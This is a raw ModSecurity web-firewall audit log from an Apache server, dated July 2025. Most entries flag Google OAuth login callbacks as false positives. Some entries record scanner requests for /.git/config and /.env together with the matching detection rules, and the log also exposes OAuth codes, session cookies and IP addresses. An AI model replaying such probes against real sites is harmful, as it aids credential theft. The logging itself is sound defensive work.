Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --e69c312c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIDnDzwUUVu1Y0WeVTsvgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753351068225854 862947 (- - -) Stopwatch2: 1753351068225854 862947; combined=5606, p1=737, p2=4612, p3=86, p4=65, p5=105, sr=182, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e69c312c-Z-- --10e0f76f-A-- [24/Jul/2025:12:59:46.370833 +0300] aIIEEjzwUUVu1Y0WeVTvPwAAABQ 213.136.84.241 60308 127.0.0.1 7081 --10e0f76f-B-- GET /.git/config HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 213.136.84.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Accept-Charset: utf-8 Accept-Encoding: gzip --10e0f76f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --10e0f76f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.jinansystem.com"] [uri "/.git/config"] [unique_id "aIIEEjzwUUVu1Y0WeVTvPwAAABQ"] Stopwatch: 1753351186365993 4931 (- - -) Stopwatch2: 1753351186365993 4931; combined=2918, p1=651, p2=2187, p3=0, p4=0, p5=80, sr=183, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10e0f76f-Z-- --344f596b-A-- [24/Jul/2025:13:00:59.087477 +0300] aIIEW4TiRAaWRFFxa-Xz3QAAAMY 64.62.197.182 36274 127.0.0.1 7081 --344f596b-B-- GET /.git/config HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 64.62.197.182 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip --344f596b-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --344f596b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.git/config"] [unique_id "aIIEW4TiRAaWRFFxa-Xz3QAAAMY"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753351259086293 1329 (- - -) Stopwatch2: 1753351259086293 1329; combined=698, p1=556, p2=0, p3=30, p4=29, p5=83, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --344f596b-Z-- --c0aa1d16-A-- [24/Jul/2025:13:03:21.931512 +0300] aIIE6TzwUUVu1Y0WeVT21QAAAA0 212.28.242.188 36694 127.0.0.1 7081 --c0aa1d16-B-- GET /administration/index.php?code=4/0AVMBsJjCwgoIfSGs2c4TR_pUx22tDsrXFTsN-CqyY5pUat-lCScGDMZRQ89mqSH9YLcuug&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=kleui039c2kf5tql3k1uj7gq36 --c0aa1d16-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --c0aa1d16-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIE6TzwUUVu1Y0WeVT21QAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753351401509322 422339 (- - -) Stopwatch2: 1753351401509322 422339; combined=5442, p1=632, p2=4483, p3=158, p4=52, p5=117, sr=192, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0aa1d16-Z-- --716e0255-A-- [24/Jul/2025:13:10:05.898376 +0300] aIIGfYTiRAaWRFFxa-X7RQAAAMY 212.28.242.188 32946 127.0.0.1 7081 --716e0255-B-- GET /administration/index.php?code=4/0AVMBsJjP4jJertfvExMa7kYyPRVGvC7ujwJDlBDRgNCPJC73H66SmjnNax_VOa0pRpkNAA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar-LB;q=0.8,ar;q=0.7 priority: u=0, i cookie: PHPSESSID=5n9q4usu0el14pgif1pasho0k5 --716e0255-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --716e0255-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIGfYTiRAaWRFFxa-X7RQAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753351805480147 418473 (- - -) Stopwatch2: 1753351805480147 418473; combined=4568, p1=595, p2=3587, p3=137, p4=70, p5=178, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --716e0255-Z-- --ce58d978-A-- [24/Jul/2025:13:18:12.080913 +0300] aIIIY4TiRAaWRFFxa-UAzgAAAMI 212.28.242.188 50382 127.0.0.1 7081 --ce58d978-B-- GET /administration/index.php?code=4/0AVMBsJjqkW18FAg26eU73O7qOEjXGRQVzpAlXUvPHqIU6NgdMmiqKsBSILoyuf_07txG-Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=21bpo7shvcragcdcm1a0pbtd05 --ce58d978-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --ce58d978-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIIY4TiRAaWRFFxa-UAzgAAAMI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753352291659596 421593 (- - -) Stopwatch2: 1753352291659596 421593; combined=5669, p1=1308, p2=3992, p3=134, p4=64, p5=170, sr=187, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce58d978-Z-- --f135107a-A-- [24/Jul/2025:13:35:40.576028 +0300] aIIMfDzwUUVu1Y0WeVQn8AAAAAQ 78.40.176.204 47976 127.0.0.1 7081 --f135107a-B-- GET /administration/index.php?code=4/0AVMBsJjnoCMoXR4Q3JO0qnyKb3acjEsHDx5Tb8QUI08DDW2vjNofKpk-jvaVwT_COlXEEw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=6j0umccp0iank52osnu2nvsfe1 --f135107a-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --f135107a-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIMfDzwUUVu1Y0WeVQn8AAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753353340153328 422932 (- - -) Stopwatch2: 1753353340153328 422932; combined=4769, p1=763, p2=3541, p3=171, p4=82, p5=212, sr=184, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f135107a-Z-- --9ee07933-A-- [24/Jul/2025:13:41:45.603958 +0300] aIIN6YTiRAaWRFFxa-UQagAAAMg 212.28.242.188 35194 127.0.0.1 7081 --9ee07933-B-- GET /administration/index.php?code=4/0AVMBsJi9M4fGfQ3zzWq5T7wdQFdqDUiwpD4Hi-36hFoX7g3wSF_VyLrTg6e0qBx4dJmIHA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=v59lqf2cvue7cvsqti533ibvt0 --9ee07933-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --9ee07933-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIN6YTiRAaWRFFxa-UQagAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753353705128300 475855 (- - -) Stopwatch2: 1753353705128300 475855; combined=4475, p1=513, p2=3607, p3=133, p4=62, p5=159, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9ee07933-Z-- --2db3ed6c-A-- [24/Jul/2025:13:43:17.328798 +0300] aIIORTzwUUVu1Y0WeVQ1GgAAABc 196.251.70.223 59192 127.0.0.1 7081 --2db3ed6c-B-- GET /.env HTTP/1.0 Host: sys.own-dev.com X-Real-IP: 196.251.70.223 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --2db3ed6c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=6f9c0204e4b1320c550aeb7baa0e6b8a; expires=Thu, 24 Jul 2025 11:44:17 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --2db3ed6c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.own-dev.com"] [uri "/.env"] [unique_id "aIIORTzwUUVu1Y0WeVQ1GgAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.own-dev.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753353797257050 71878 (- - -) Stopwatch2: 1753353797257050 71878; combined=22675, p1=19890, p2=2661, p3=0, p4=0, p5=123, sr=245, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2db3ed6c-Z-- --d9bda378-A-- [24/Jul/2025:13:49:04.764199 +0300] aIIPoDzwUUVu1Y0WeVRAJgAAAAA 195.112.198.68 56600 127.0.0.1 7081 --d9bda378-B-- GET /administration/index.php?code=4/0AVMBsJiFTZVbQ3SzR-KfwfKQX-_EO2UE7pui2cNa_Yx7Cjp4qSjykjQDMfg3TlYDWwMc9g&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --d9bda378-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --d9bda378-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file 